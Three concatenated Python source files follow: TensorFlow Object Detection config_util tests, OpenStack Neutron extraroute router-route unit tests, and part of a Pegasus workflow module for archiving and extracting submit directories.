        reader = proto.eval_input_reader.add()
        reader.mask_type = input_reader_pb2.NUMERICAL_MASKS
        reader.name = name
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs, kwargs_dict={"mask_type": new_mask_type})
    self.assertEqual(configs["train_input_config"].mask_type, new_mask_type)
    for eval_input_config in configs["eval_input_configs"]:
        self.assertEqual(eval_input_config.mask_type, new_mask_type)
def testErrorOverwritingMultipleInputConfig(self):
    """A legacy-style override with several eval readers must raise."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    for name in ("eval_1", "eval_2"):
        reader = proto.eval_input_reader.add()
        reader.shuffle = False
        reader.name = name
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    # "eval_shuffle" is ambiguous when two eval readers are configured.
    with self.assertRaises(ValueError):
        config_util.merge_external_params_with_configs(
            configs, kwargs_dict={"eval_shuffle": True})
def testCheckAndParseInputConfigKey(self):
    """Parsing of fully-qualified, legacy, and invalid input-config keys."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.eval_input_reader.add().name = "eval_1"
    proto.eval_input_reader.add().name = "eval_2"
    _write_config(proto, config_file)
    configs = config_util.get_configs_from_pipeline_file(config_file)

    # Fully-qualified key targeting a specific eval input.
    is_valid, key_name, input_name, field_name = (
        config_util.check_and_parse_input_config_key(
            configs, "eval_input_configs:eval_2:shuffle"))
    self.assertTrue(is_valid)
    self.assertEqual(key_name, "eval_input_configs")
    self.assertEqual(input_name, "eval_2")
    self.assertEqual(field_name, "shuffle")

    # Legacy key addressing the eval inputs without a name.
    is_valid, key_name, input_name, field_name = (
        config_util.check_and_parse_input_config_key(configs, "eval_shuffle"))
    self.assertTrue(is_valid)
    self.assertEqual(key_name, "eval_input_configs")
    self.assertIsNone(input_name)
    self.assertEqual(field_name, "shuffle")

    # A plain field name is not an input-config key.
    is_valid, key_name, input_name, field_name = (
        config_util.check_and_parse_input_config_key(
            configs, "label_map_path"))
    self.assertFalse(is_valid)
    self.assertIsNone(key_name)
    self.assertIsNone(input_name)
    self.assertEqual(field_name, "label_map_path")

    # Malformed or unknown keys raise descriptive ValueErrors.
    bad_keys_and_errors = [
        ("train_input_config:shuffle",
         "Invalid key format when overriding configs."),
        ("invalid_key_name:train_name:shuffle",
         "Invalid key_name when overriding input config."),
        ("eval_input_configs:unknown_eval_name:shuffle",
         "Invalid input_name when overriding input config."),
        ("eval_input_configs:eval_2:unknown_field_name",
         "Invalid field_name when overriding input config."),
    ]
    for bad_key, error_regex in bad_keys_and_errors:
        with self.assertRaisesRegexp(ValueError, error_regex):
            config_util.check_and_parse_input_config_key(configs, bad_key)
def testUpdateInputReaderConfigSuccess(self):
    """Updates a train input reader field through update_input_reader_config."""
    original_shuffle = False
    new_shuffle = True
    pipeline_config_path = os.path.join(self.get_temp_dir(), "pipeline.config")
    pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
    pipeline_config.train_input_reader.shuffle = original_shuffle
    _write_config(pipeline_config, pipeline_config_path)
    configs = config_util.get_configs_from_pipeline_file(pipeline_config_path)
    # input_name=None targets the singleton train input reader directly.
    config_util.update_input_reader_config(
        configs,
        key_name="train_input_config",
        input_name=None,
        field_name="shuffle",
        value=new_shuffle)
    self.assertEqual(configs["train_input_config"].shuffle, new_shuffle)
    # NOTE(review): this second call is byte-identical to the first —
    # presumably it verifies that re-applying the same update is safe
    # (idempotent), but it may be a copy-paste remnant; confirm intent.
    config_util.update_input_reader_config(
        configs,
        key_name="train_input_config",
        input_name=None,
        field_name="shuffle",
        value=new_shuffle)
    self.assertEqual(configs["train_input_config"].shuffle, new_shuffle)
def testUpdateInputReaderConfigErrors(self):
    """Error paths of update_input_reader_config for eval input readers."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.eval_input_reader.add().name = "same_eval_name"
    proto.eval_input_reader.add().name = "same_eval_name"
    _write_config(proto, config_file)
    configs = config_util.get_configs_from_pipeline_file(config_file)

    def _attempt_update(input_name):
        # All error cases vary only by input_name.
        config_util.update_input_reader_config(
            configs,
            key_name="eval_input_configs",
            input_name=input_name,
            field_name="shuffle",
            value=False)

    # Two readers share the same name: ambiguous target.
    with self.assertRaisesRegexp(ValueError,
                                 "Duplicate input name found when overriding."):
        _attempt_update("same_eval_name")
    # No reader has the requested name.
    with self.assertRaisesRegexp(
        ValueError, "Input name name_not_exist not found when overriding."):
        _attempt_update("name_not_exist")
    # input_name=None is invalid when multiple eval readers exist.
    with self.assertRaisesRegexp(ValueError,
                                 "Unknown input config overriding."):
        _attempt_update(None)
def testOverWriteRetainOriginalImageAdditionalChannels(self):
    """Tests that keyword arguments are applied correctly."""
    config_file = os.path.join(self.get_temp_dir(), "pipeline.config")
    proto = pipeline_pb2.TrainEvalPipelineConfig()
    proto.eval_config.retain_original_image_additional_channels = True
    _write_config(proto, config_file)

    configs = config_util.get_configs_from_pipeline_file(config_file)
    configs = config_util.merge_external_params_with_configs(
        configs,
        kwargs_dict={
            "retain_original_image_additional_channels_in_eval": False
        })
    self.assertFalse(
        configs["eval_config"].retain_original_image_additional_channels)
def testRemoveUnecessaryEma(self):
    """ExponentialMovingAverage suffixes are stripped only after /min or /max.

    (The test name mirrors the spelling of the function under test,
    config_util.remove_unecessary_ema.)
    """
    ema = "ExponentialMovingAverage"
    input_dict = {
        "expanded_conv_10/project/act_quant/min": 1,
        "FeatureExtractor/MobilenetV2_2/expanded_conv_5/expand/act_quant/min":
            2,
        "expanded_conv_10/expand/BatchNorm/gamma/min/" + ema: 3,
        "expanded_conv_3/depthwise/BatchNorm/beta/max/" + ema: 4,
        "BoxPredictor_1/ClassPredictor_depthwise/act_quant": 5,
    }
    expected = {
        "expanded_conv_10/project/act_quant/min": 1,
        "FeatureExtractor/MobilenetV2_2/expanded_conv_5/expand/act_quant/min":
            2,
        "expanded_conv_10/expand/BatchNorm/gamma/min": 3,
        "expanded_conv_3/depthwise/BatchNorm/beta/max": 4,
        "BoxPredictor_1/ClassPredictor_depthwise/act_quant": 5,
    }
    self.assertEqual(
        expected,
        config_util.remove_unecessary_ema(input_dict, ["/min", "/max"]))
# Script entry point: discover and run the test cases in this module.
if __name__ == "__main__":
    tf.test.main()
| |
# Copyright 2013, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_utils import uuidutils
from webob import exc
from neutron.common import constants
from neutron.common import utils
from neutron import context
from neutron.db import extraroute_db
from neutron.extensions import extraroute
from neutron.extensions import l3
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.extensions import test_l3 as test_l3
_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path
class ExtraRouteTestExtensionManager(object):
    """Extension manager exposing the l3 resources extended with extraroute."""

    def get_resources(self):
        # Graft the extraroute attributes onto the router resource before
        # handing out the standard l3 resources.
        router_attrs = extraroute.EXTENDED_ATTRIBUTES_2_0['routers']
        l3.RESOURCE_ATTRIBUTE_MAP['routers'].update(router_attrs)
        return l3.L3.get_resources()

    def get_actions(self):
        return []

    def get_request_extensions(self):
        return []
# This plugin class is for tests with plugin that integrates L3.
class TestExtraRouteIntPlugin(test_l3.TestL3NatIntPlugin,
                              extraroute_db.ExtraRoute_db_mixin):
    # Advertise extraroute support on top of the base external-net/router set.
    supported_extension_aliases = ["external-net", "router", "extraroute"]
# A fake l3 service plugin class with extra route capability for
# plugins that delegate away L3 routing functionality
class TestExtraRouteL3NatServicePlugin(test_l3.TestL3NatServicePlugin,
                                       extraroute_db.ExtraRoute_db_mixin):
    # external-net is provided by the core plugin in the separated setup.
    supported_extension_aliases = ["router", "extraroute"]
class ExtraRouteDBTestCaseBase(object):
def _routes_update_prepare(
self, router_id, subnet_id,
port_id, routes, skip_add=False, tenant_id=None):
if not skip_add:
self._router_interface_action(
'add', router_id, subnet_id, port_id, tenant_id=None)
ctxt = context.Context('', tenant_id) if tenant_id else None
self._update('routers', router_id, {'router': {'routes': routes}},
neutron_context=ctxt)
return self._show('routers', router_id)
def _routes_update_cleanup(self, port_id, subnet_id, router_id, routes):
self._update('routers', router_id, {'router': {'routes': routes}})
self._router_interface_action('remove', router_id, subnet_id, port_id)
    def test_route_update_with_one_route(self):
        """A single extra route can be set on a router and read back."""
        routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    body = self._routes_update_prepare(r['router']['id'],
                                                       None, p['port']['id'],
                                                       routes)
                    self.assertEqual(routes, body['router']['routes'])
                    self._routes_update_cleanup(p['port']['id'],
                                                None, r['router']['id'], [])
    def test_route_update_with_external_route(self):
        """A tenant can set routes on its router that has an external gateway."""
        my_tenant = 'tenant1'
        routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
        # The external network belongs to another tenant ('notme').
        with self.subnet(cidr='10.0.1.0/24', tenant_id='notme') as ext_subnet:
            self._set_net_external(ext_subnet['subnet']['network_id'])
            ext_info = {'network_id': ext_subnet['subnet']['network_id']}
            with self.router(
                external_gateway_info=ext_info, tenant_id=my_tenant) as r:
                body = self._routes_update_prepare(
                    r['router']['id'], None, None, routes, skip_add=True,
                    tenant_id=my_tenant)
                self.assertEqual(routes, body['router']['routes'])
    def test_route_update_with_route_via_another_tenant_subnet(self):
        """Routes may be set via an interface on another tenant's subnet."""
        my_tenant = 'tenant1'
        routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
        with self.subnet(cidr='10.0.1.0/24', tenant_id='notme') as subnet:
            with self.router(tenant_id=my_tenant) as r:
                body = self._routes_update_prepare(
                    r['router']['id'], subnet['subnet']['id'], None, routes,
                    tenant_id=my_tenant)
                self.assertEqual(routes, body['router']['routes'])
    def test_route_clear_routes_with_None(self):
        """Updating 'routes' to None clears all routes on the router."""
        routes = [{'destination': '135.207.0.0/16',
                   'nexthop': '10.0.1.3'},
                  {'destination': '12.0.0.0/8',
                   'nexthop': '10.0.1.4'},
                  {'destination': '141.212.0.0/16',
                   'nexthop': '10.0.1.5'}]
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._routes_update_prepare(r['router']['id'],
                                                None, p['port']['id'], routes)
                    body = self._update('routers', r['router']['id'],
                                        {'router': {'routes': None}})
                    self.assertEqual([], body['router']['routes'])
                    self._routes_update_cleanup(p['port']['id'],
                                                None, r['router']['id'], [])
    def test_router_interface_in_use_by_route(self):
        """Removing an interface that a route's nexthop relies on returns 409."""
        routes = [{'destination': '135.207.0.0/16',
                   'nexthop': '10.0.1.3'}]
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    body = self._routes_update_prepare(r['router']['id'],
                                                       None, p['port']['id'],
                                                       routes)
                    self.assertEqual(routes, body['router']['routes'])
                    # The interface is in use by the route above.
                    self._router_interface_action(
                        'remove',
                        r['router']['id'],
                        None,
                        p['port']['id'],
                        expected_code=exc.HTTPConflict.code)
                    self._routes_update_cleanup(p['port']['id'],
                                                None, r['router']['id'], [])
    def test_route_update_with_multi_routes(self):
        """Several routes can be set at once; comparison is order-insensitive."""
        routes = [{'destination': '135.207.0.0/16',
                   'nexthop': '10.0.1.3'},
                  {'destination': '12.0.0.0/8',
                   'nexthop': '10.0.1.4'},
                  {'destination': '141.212.0.0/16',
                   'nexthop': '10.0.1.5'}]
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    body = self._routes_update_prepare(r['router']['id'],
                                                       None, p['port']['id'],
                                                       routes)
                    self.assertEqual(
                        sorted(body['router']['routes'],
                               key=utils.safe_sort_key),
                        sorted(routes, key=utils.safe_sort_key))
                    self._routes_update_cleanup(p['port']['id'],
                                                None, r['router']['id'], [])
    def test_routes_update_for_multiple_routers(self):
        """Routes on two routers sharing one subnet do not interfere."""
        routes1 = [{'destination': '135.207.0.0/16',
                    'nexthop': '10.0.0.3'}]
        routes2 = [{'destination': '12.0.0.0/8',
                    'nexthop': '10.0.0.4'}]
        with self.router() as r1,\
                self.router() as r2,\
                self.subnet(cidr='10.0.0.0/24') as s:
            with self.port(subnet=s) as p1, self.port(subnet=s) as p2:
                body = self._routes_update_prepare(r1['router']['id'],
                                                   None, p1['port']['id'],
                                                   routes1)
                self.assertEqual(routes1, body['router']['routes'])
                body = self._routes_update_prepare(r2['router']['id'],
                                                   None, p2['port']['id'],
                                                   routes2)
                self.assertEqual(routes2, body['router']['routes'])
                self._routes_update_cleanup(p1['port']['id'],
                                            None, r1['router']['id'], [])
                self._routes_update_cleanup(p2['port']['id'],
                                            None, r2['router']['id'], [])
    def test_router_update_delete_routes(self):
        """An update listing a subset of routes deletes the missing ones."""
        routes_orig = [{'destination': '135.207.0.0/16',
                        'nexthop': '10.0.1.3'},
                       {'destination': '12.0.0.0/8',
                        'nexthop': '10.0.1.4'},
                       {'destination': '141.212.0.0/16',
                        'nexthop': '10.0.1.5'}]
        routes_left = [{'destination': '135.207.0.0/16',
                        'nexthop': '10.0.1.3'},
                       {'destination': '141.212.0.0/16',
                        'nexthop': '10.0.1.5'}]
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    body = self._routes_update_prepare(r['router']['id'],
                                                       None, p['port']['id'],
                                                       routes_orig)
                    self.assertEqual(
                        sorted(body['router']['routes'],
                               key=utils.safe_sort_key),
                        sorted(routes_orig, key=utils.safe_sort_key))
                    # Second update drops the 12.0.0.0/8 route.
                    body = self._routes_update_prepare(r['router']['id'],
                                                       None, p['port']['id'],
                                                       routes_left,
                                                       skip_add=True)
                    self.assertEqual(
                        sorted(body['router']['routes'],
                               key=utils.safe_sort_key),
                        sorted(routes_left, key=utils.safe_sort_key))
                    self._routes_update_cleanup(p['port']['id'],
                                                None, r['router']['id'], [])
def _test_malformed_route(self, routes):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
p['port']['id'])
self._update('routers', r['router']['id'],
{'router': {'routes': routes}},
expected_code=exc.HTTPBadRequest.code)
# clean-up
self._router_interface_action('remove',
r['router']['id'],
None,
p['port']['id'])
    def test_no_destination_route(self):
        """A route missing 'destination' is rejected with HTTP 400."""
        self._test_malformed_route([{'nexthop': '10.0.1.6'}])
def test_no_nexthop_route(self):
self._test_malformed_route({'destination': '135.207.0.0/16'})
    def test_none_destination(self):
        """A route whose 'destination' is None is rejected with HTTP 400."""
        self._test_malformed_route([{'destination': None,
                                     'nexthop': '10.0.1.3'}])
    def test_none_nexthop(self):
        """A route whose 'nexthop' is None is rejected with HTTP 400."""
        self._test_malformed_route([{'destination': '135.207.0.0/16',
                                     'nexthop': None}])
    def test_nexthop_is_port_ip(self):
        """A route whose nexthop is the router port's own IP is rejected."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._router_interface_action('add',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
                    port_ip = p['port']['fixed_ips'][0]['ip_address']
                    routes = [{'destination': '135.207.0.0/16',
                               'nexthop': port_ip}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # clean-up
                    self._router_interface_action('remove',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
    def test_router_update_with_too_many_routes(self):
        """Exceeding max_routes (set to 3 in these test cases) returns 400."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._router_interface_action('add',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
                    # Four routes, one over the configured limit.
                    routes = [{'destination': '135.207.0.0/16',
                               'nexthop': '10.0.1.3'},
                              {'destination': '12.0.0.0/8',
                               'nexthop': '10.0.1.4'},
                              {'destination': '141.212.0.0/16',
                               'nexthop': '10.0.1.5'},
                              {'destination': '192.168.0.0/16',
                               'nexthop': '10.0.1.6'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # clean-up
                    self._router_interface_action('remove',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
    def test_router_update_with_dup_address(self):
        """Duplicate routes in a single update are rejected with HTTP 400."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._router_interface_action('add',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
                    routes = [{'destination': '135.207.0.0/16',
                               'nexthop': '10.0.1.3'},
                              {'destination': '135.207.0.0/16',
                               'nexthop': '10.0.1.3'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # clean-up
                    self._router_interface_action('remove',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
    def test_router_update_with_invalid_ip_address(self):
        """Invalid destination CIDRs (bad octet, bad prefix, junk) return 400."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._router_interface_action('add',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
                    # Octet out of range.
                    routes = [{'destination': '512.207.0.0/16',
                               'nexthop': '10.0.1.3'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # Prefix length out of range for IPv4.
                    routes = [{'destination': '127.207.0.0/48',
                               'nexthop': '10.0.1.3'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # Not an IP address at all.
                    routes = [{'destination': 'invalid_ip_address',
                               'nexthop': '10.0.1.3'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # clean-up
                    self._router_interface_action('remove',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
    def test_router_update_with_invalid_nexthop_ip(self):
        """A syntactically invalid nexthop address is rejected with 400."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._router_interface_action('add',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
                    # Deliberately malformed nexthop (out-of-range octet).
                    routes = [{'destination': '127.207.0.0/16',
                               'nexthop': ' 300.10.10.4'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # clean-up
                    self._router_interface_action('remove',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
    def test_router_update_with_nexthop_is_outside_port_subnet(self):
        """A nexthop not reachable via any router interface subnet returns 400."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                with self.port(subnet=s) as p:
                    self._router_interface_action('add',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
                    # 20.10.10.4 is outside the attached 10.0.1.0/24 subnet.
                    routes = [{'destination': '127.207.0.0/16',
                               'nexthop': ' 20.10.10.4'}]
                    self._update('routers', r['router']['id'],
                                 {'router': {'routes':
                                             routes}},
                                 expected_code=exc.HTTPBadRequest.code)
                    # clean-up
                    self._router_interface_action('remove',
                                                  r['router']['id'],
                                                  None,
                                                  p['port']['id'])
    def test_router_update_on_external_port(self):
        """Routes can be set on a router whose only port is the gateway port."""
        with self.router() as r:
            with self.subnet(cidr='10.0.1.0/24') as s:
                self._set_net_external(s['subnet']['network_id'])
                self._add_external_gateway_to_router(
                    r['router']['id'],
                    s['subnet']['network_id'])
                body = self._show('routers', r['router']['id'])
                net_id = body['router']['external_gateway_info']['network_id']
                self.assertEqual(net_id, s['subnet']['network_id'])
                # Exactly one gateway port should have been created.
                port_res = self._list_ports(
                    'json',
                    200,
                    s['subnet']['network_id'],
                    tenant_id=r['router']['tenant_id'],
                    device_owner=constants.DEVICE_OWNER_ROUTER_GW)
                port_list = self.deserialize('json', port_res)
                self.assertEqual(1, len(port_list['ports']))
                routes = [{'destination': '135.207.0.0/16',
                           'nexthop': '10.0.1.3'}]
                body = self._update('routers', r['router']['id'],
                                    {'router': {'routes':
                                                routes}})
                body = self._show('routers', r['router']['id'])
                self.assertEqual(routes, body['router']['routes'])
                self._remove_external_gateway_from_router(
                    r['router']['id'],
                    s['subnet']['network_id'])
                body = self._show('routers', r['router']['id'])
                gw_info = body['router']['external_gateway_info']
                self.assertIsNone(gw_info)
    def test_router_list_with_sort(self):
        """Router list supports descending sort by name."""
        with self.router(name='router1') as router1,\
                self.router(name='router2') as router2,\
                self.router(name='router3') as router3:
            self._test_list_with_sort('router', (router3, router2, router1),
                                      [('name', 'desc')])
    def test_router_list_with_pagination(self):
        """Router list supports forward pagination (page size 2)."""
        with self.router(name='router1') as router1,\
                self.router(name='router2') as router2,\
                self.router(name='router3') as router3:
            self._test_list_with_pagination('router',
                                            (router1, router2, router3),
                                            ('name', 'asc'), 2, 2)
    def test_router_list_with_pagination_reverse(self):
        """Router list supports reverse pagination (page size 2)."""
        with self.router(name='router1') as router1,\
                self.router(name='router2') as router2,\
                self.router(name='router3') as router3:
            self._test_list_with_pagination_reverse('router',
                                                    (router1, router2,
                                                     router3),
                                                    ('name', 'asc'), 2, 2)
class ExtraRouteDBIntTestCase(test_l3.L3NatDBIntTestCase,
                              ExtraRouteDBTestCaseBase):
    """Runs the extraroute suite against a core plugin that integrates L3."""

    def setUp(self, plugin=None, ext_mgr=None):
        if not plugin:
            plugin = ('neutron.tests.unit.extensions.test_extraroute.'
                      'TestExtraRouteIntPlugin')
        # for these tests we need to enable overlapping ips
        cfg.CONF.set_default('allow_overlapping_ips', True)
        cfg.CONF.set_default('max_routes', 3)
        # NOTE(review): the ext_mgr argument is always overridden here.
        ext_mgr = ExtraRouteTestExtensionManager()
        # super() is anchored at L3BaseForIntTests, so setUp implementations
        # between this class and it in the MRO are deliberately bypassed.
        super(test_l3.L3BaseForIntTests, self).setUp(plugin=plugin,
                                                     ext_mgr=ext_mgr)
        self.setup_notification_driver()
class ExtraRouteDBSepTestCase(test_l3.L3NatDBSepTestCase,
                              ExtraRouteDBTestCaseBase):
    """Runs the extraroute suite with L3 delegated to a service plugin."""

    def setUp(self):
        # the plugin without L3 support
        plugin = 'neutron.tests.unit.extensions.test_l3.TestNoL3NatPlugin'
        # the L3 service plugin
        l3_plugin = ('neutron.tests.unit.extensions.test_extraroute.'
                     'TestExtraRouteL3NatServicePlugin')
        service_plugins = {'l3_plugin_name': l3_plugin}

        # for these tests we need to enable overlapping ips
        cfg.CONF.set_default('allow_overlapping_ips', True)
        cfg.CONF.set_default('max_routes', 3)
        ext_mgr = ExtraRouteTestExtensionManager()
        # super() is anchored at L3BaseForSepTests, bypassing intermediate
        # setUp implementations in the MRO.
        super(test_l3.L3BaseForSepTests, self).setUp(
            plugin=plugin, ext_mgr=ext_mgr,
            service_plugins=service_plugins)

        self.setup_notification_driver()
| |
"""."""
import glob
import logging
import os
import shutil
import tarfile
from os.path import expanduser
from Pegasus.command import CompoundCommand, LoggingCommand
from Pegasus.db import connection
from Pegasus.db.schema import (
EnsembleWorkflow,
MasterWorkflow,
MasterWorkflowstate,
Workflow,
Workflowstate,
)
from Pegasus.tools import utils
log = logging.getLogger(__name__)
class SubmitDirException(Exception):
    """Raised for invalid or conflicting submit-directory operations."""
    pass
class MasterDatabase:
    """Query helper wrapping a session on the master (dashboard) database."""

    def __init__(self, session):
        self.session = session

    def get_master_workflow(self, wf_uuid, submit_dir=None):
        """Return the master workflow matching wf_uuid (and submit_dir, if
        given), or None."""
        criteria = [MasterWorkflow.wf_uuid == wf_uuid]
        if submit_dir:
            criteria.append(MasterWorkflow.submit_dir == submit_dir)
        return self.session.query(MasterWorkflow).filter(*criteria).first()

    def get_master_workflow_for_submitdir(self, submitdir):
        """Return all master workflow records pointing at submitdir."""
        query = self.session.query(MasterWorkflow).filter(
            MasterWorkflow.submit_dir == submitdir)
        return query.all()

    def get_ensemble_workflow(self, wf_uuid):
        """Return the ensemble workflow record for wf_uuid, or None."""
        query = self.session.query(EnsembleWorkflow).filter(
            EnsembleWorkflow.wf_uuid == wf_uuid)
        return query.first()

    def delete_master_workflow(self, wf_uuid, submit_dir=None):
        """Delete the master workflow row for wf_uuid plus any ensemble rows.

        No-op when no matching master workflow exists.
        """
        workflow = self.get_master_workflow(wf_uuid, submit_dir=submit_dir)
        if workflow is None:
            return

        # Delete any ensemble workflows referencing the same uuid first.
        self.session.query(EnsembleWorkflow).filter(
            EnsembleWorkflow.wf_uuid == wf_uuid).delete()

        # Then delete the master workflow row itself.
        self.session.query(MasterWorkflow).filter(
            MasterWorkflow.wf_id == workflow.wf_id).delete()
class WorkflowDatabase:
    """Query helper wrapping a session on a per-workflow database."""

    def __init__(self, session):
        self.session = session

    def delete_workflow(self, wf_uuid):
        """Delete the workflow row for wf_uuid; warn and return if absent."""
        workflow = self.get_workflow(wf_uuid)
        if workflow is None:
            log.warning("Workflow not found in workflow DB: %s" % wf_uuid)
            return
        self.session.delete(workflow)

    def get_workflow(self, wf_uuid):
        """Return the workflow row for wf_uuid, or None."""
        query = self.session.query(Workflow).filter(
            Workflow.wf_uuid == wf_uuid)
        return query.first()

    def get_workflow_states(self, wf_id):
        """Return all workflow-state rows recorded for wf_id."""
        query = self.session.query(Workflowstate).filter(
            Workflowstate.wf_id == wf_id)
        return query.all()

    def update_submit_dirs(self, root_wf_id, src, dest):
        """Rewrite src -> dest inside submit_dir for every workflow whose
        root is root_wf_id (the root itself and all sub-workflows)."""
        query = self.session.query(Workflow).filter(
            Workflow.root_wf_id == root_wf_id)
        for workflow in query.all():
            log.info("Old submit dir: %s" % workflow.submit_dir)
            workflow.submit_dir = workflow.submit_dir.replace(src, dest)
            log.info("New submit dir: %s" % workflow.submit_dir)
class SubmitDir:
def __init__(self, submitdir, raise_err=True):
self.submitdir = os.path.abspath(submitdir)
self.submitdir_exists = True
if not os.path.isdir(submitdir):
self.submitdir_exists = False
if raise_err is False:
return
raise SubmitDirException("Invalid submit dir: %s" % submitdir)
self.braindump_file = os.path.join(self.submitdir, "braindump.yml")
if not os.path.isfile(self.braindump_file):
self.braindump_file = os.path.join(self.submitdir, "braindump.txt")
# Read the braindump file
self.braindump = utils.slurp_braindb(os.path.join(self.submitdir))
# Read some attributes from braindump file
self.wf_uuid = self.braindump["wf_uuid"]
self.root_wf_uuid = self.braindump["root_wf_uuid"]
self.user = self.braindump["user"]
self.archname = os.path.join(self.submitdir, "archive.tar.gz")
def is_subworkflow(self):
"Check to see if this workflow is a subworkflow"
return self.wf_uuid != self.root_wf_uuid
def is_archived(self):
"A submit dir is archived if the archive file exists"
return os.path.isfile(self.archname)
    def extract(self):
        """Extract files from an archived submit dir.

        Unpacks archive.tar.gz into the submit dir, deletes the archive,
        and clears the 'archived' flag on the master DB record if one
        exists.
        """
        # Locate archive file
        if not self.is_archived():
            raise SubmitDirException("Submit dir not archived")

        # Update record in master db
        mdbsession = connection.connect_by_submitdir(
            self.submitdir, connection.DBType.MASTER
        )
        mdb = MasterDatabase(mdbsession)
        wf = mdb.get_master_workflow(self.wf_uuid)
        if wf is not None:
            wf.archived = False

        # Untar the files
        tar = tarfile.open(self.archname, "r:gz")
        tar.extractall(path=self.submitdir)
        tar.close()

        # Remove the tar file
        os.remove(self.archname)

        # Commit the workflow changes (only after extraction succeeded)
        mdbsession.commit()
        mdbsession.close()
    def archive(self):
        """Archive a submit dir by adding files to a compressed archive.

        Restartable two-phase operation: files (minus a small exclusion
        set) are written to a temporary tar.gz which is renamed into place
        ("commit" of the archive step); then the originals are removed
        under the protection of a lock file ("commit" of the cleanup
        step).  The master DB record, if present, is flagged archived.
        """
        # Update record in master db
        mdbsession = connection.connect_by_submitdir(
            self.submitdir, connection.DBType.MASTER
        )
        mdb = MasterDatabase(mdbsession)
        wf = mdb.get_master_workflow(self.wf_uuid)
        if wf is not None:
            wf.archived = True

        # The set of files to exclude from the archive
        exclude = set()

        # Exclude braindump file
        exclude.add(self.braindump_file)

        # We use a temporary file so that we can determine if the archive step
        # completed successfully later
        tmparchname = os.path.join(self.submitdir, "archive.tmp.tar.gz")

        # We use a lock file to determine if cleanup is complete
        lockfile = os.path.join(self.submitdir, "archive.cleanup.lock")

        # If a previous archive was partially completed, then remove the
        # temporary file that was created
        if os.path.exists(tmparchname):
            os.unlink(tmparchname)

        # Exclude the temporary archive name so we don't add it to itself
        exclude.add(tmparchname)

        # We don't want the lock file to be saved, if it exists
        exclude.add(lockfile)

        # Also exclude the final archive name in case they try to run it again
        exclude.add(self.archname)

        # Ignore monitord files. This is needed so that tools like pegasus-statistics
        # will consider the workflow to be complete
        for name in ["monitord.started", "monitord.done", "monitord.log"]:
            exclude.add(os.path.join(self.submitdir, name))

        # Exclude stampede db
